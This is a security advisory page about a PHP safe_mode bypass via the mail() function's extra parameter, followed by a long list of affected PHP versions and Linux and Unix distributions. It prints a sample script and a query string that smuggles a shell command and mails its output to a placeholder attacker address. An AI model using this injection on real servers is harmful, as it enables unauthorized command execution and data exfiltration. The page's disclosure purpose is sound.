J-Security Center

Title: PHP SafeMode Arbitrary File Execution Vulnerability

Severity: MODERATE

Description:

PHP is the Personal HomePage development toolkit, distributed by the PHP.net, and maintained by the PHP Development Team in public domain.

A problem with the toolkit could allow elevated privileges, and potentially unauthorized access to restricted resources. It is possible for a user with local access to gain privileges equal to the UID of the HTTPD process.

The problem is due to a design flaw in the toolkit that could allow a user to circumvent safe_mode. A section of code within the mail.c file adds an extra parameter, making it possible to pass commands that would ordinarily be stopped when safe_mode is set.

Because of this design flaw, it is possible for a local user to upload maliciously crafted php scripts, and execute them with simple queries, allowing for the execution of arbitrary commands on a local system.

A php script such as:

<? mail("foo@bar,"foo","bar","",$bar); ?>

Can be executed with the query string of:

http://foo.com/evil.php?bar=;/usr/bin/id|mail evil@domain.com

This could allow a user to execute commands with the privileges of the HTTP process, or gain local access to the system with the privileges of the HTTP process UID.

It has been reported that the proposed fix does not entirely fix the problem, as it's possible to pass command line parameters to sendmail when safe_mode is enabled. This may be done through the 5th argument permitted by safe_mode.

Affected Products:

  • Apple Mac OS X 10.0.0
  • Apple Mac OS X 10.0.1
  • Apple Mac OS X 10.0.2
  • Apple Mac OS X 10.0.3
  • Apple Mac OS X 10.0.4
  • Apple Mac OS X 10.1.0
  • Apple Mac OS X 10.1.0
  • Apple Mac OS X 10.1.1
  • Apple Mac OS X 10.1.2
  • Apple Mac OS X 10.1.3
  • Apple Mac OS X 10.1.4
  • Apple Mac OS X 10.1.5
  • Caldera OpenLinux Server 3.1.0
  • Caldera OpenLinux Server 3.1.1
  • Caldera OpenLinux Workstation 3.1.0
  • Caldera OpenLinux Workstation 3.1.1
  • Compaq Compaq Secure Web Server PHP 1.0.0
  • Conectiva Linux 6.0.0
  • Conectiva Linux 7.0.0
  • Debian Linux 2.2.0
  • Debian Linux 2.2.0 68k
  • Debian Linux 2.2.0 IA-32
  • Debian Linux 2.2.0 alpha
  • Debian Linux 2.2.0 arm
  • Debian Linux 2.2.0 powerpc
  • Debian Linux 2.2.0 sparc
  • Debian Linux 3.0.0 alpha
  • Debian Linux 3.0.0 arm
  • Debian Linux 3.0.0 hppa
  • Debian Linux 3.0.0 ia-32
  • Debian Linux 3.0.0 ia-64
  • Debian Linux 3.0.0 m68k
  • Debian Linux 3.0.0 mips
  • Debian Linux 3.0.0 mipsel
  • Debian Linux 3.0.0 ppc
  • Debian Linux 3.0.0 s/390
  • Debian Linux 3.0.0 sparc
  • Gentoo Linux 1.2.0
  • Gentoo Linux 1.4.0 _rc1
  • Guardian Digital Engarde Secure Linux 1.0.1
  • HP Secure OS software for Linux 1.0.0
  • MandrakeSoft Corporate Server 1.0.1
  • MandrakeSoft Linux Mandrake 7.1.0
  • MandrakeSoft Linux Mandrake 7.2.0
  • MandrakeSoft Linux Mandrake 8.0.0
  • MandrakeSoft Linux Mandrake 8.0.0 ppc
  • MandrakeSoft Linux Mandrake 8.1.0
  • MandrakeSoft Linux Mandrake 8.1.0 ia64
  • MandrakeSoft Linux Mandrake 8.2.0
  • MandrakeSoft Linux Mandrake 8.2.0 ppc
  • MandrakeSoft Multi Network Firewall 2.0.0
  • MandrakeSoft Single Network Firewall 7.2.0
  • OpenPKG OpenPKG 1.1.0
  • PHP PHP 4.0.3
  • PHP PHP 4.0.4
  • PHP PHP 4.0.5
  • PHP PHP 4.0.6
  • PHP PHP 4.0.7
  • PHP PHP 4.0.7 RC1
  • PHP PHP 4.0.7 RC2
  • PHP PHP 4.0.7 RC3
  • PHP PHP 4.1.0 .0
  • PHP PHP 4.1.1
  • PHP PHP 4.1.2
  • PHP PHP 4.2.0 .0
  • PHP PHP 4.2.1
  • PHP PHP 4.2.2
  • RedHat Linux 7.0.0
  • RedHat Linux 7.0.0 alpha
  • RedHat Linux 7.0.0 i386
  • RedHat Linux 7.1.0
  • RedHat Linux 7.1.0 alpha
  • RedHat Linux 7.1.0 i386
  • RedHat Linux 7.1.0 ia64
  • RedHat Linux 7.2.0
  • RedHat Linux 7.2.0 i386
  • RedHat Linux 7.2.0 ia64
  • RedHat Linux 8.0.0
  • RedHat Linux 8.0.0 i386
  • S.u.S.E. Linux 7.0.0
  • S.u.S.E. Linux 7.0.0 alpha
  • S.u.S.E. Linux 7.0.0 i386
  • S.u.S.E. Linux 7.0.0 ppc
  • S.u.S.E. Linux 7.0.0 sparc
  • S.u.S.E. Linux 7.1.0
  • S.u.S.E. Linux 7.1.0 alpha
  • S.u.S.E. Linux 7.1.0 ppc
  • S.u.S.E. Linux 7.1.0 sparc
  • S.u.S.E. Linux 7.1.0 x86
  • S.u.S.E. Linux 7.2.0
  • S.u.S.E. Linux 7.2.0 i386
  • S.u.S.E. Linux 7.3.0
  • S.u.S.E. Linux 7.3.0 i386
  • S.u.S.E. Linux 7.3.0 ppc
  • S.u.S.E. Linux 7.3.0 sparc
  • S.u.S.E. Linux 8.0.0
  • S.u.S.E. Linux 8.0.0 i386
  • S.u.S.E. Linux 8.1.0
  • Slackware Linux 8.1.0
  • Sun Cobalt Control Station 4100CS
  • Sun Cobalt Qube 3
  • Sun Cobalt Qube3 Japanese 4000WGJ
  • Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
  • Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
  • Sun Cobalt RaQ 4
  • Sun Cobalt RaQ 550
  • Sun Cobalt RaQ XTR
  • Sun Cobalt RaQ XTR 3500R
  • Sun Cobalt RaQ XTR Japanese 3500R-ja
  • Sun LX50
  • Sun Linux 5.0.0
  • Trustix Secure Linux 1.5.0

References:

Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.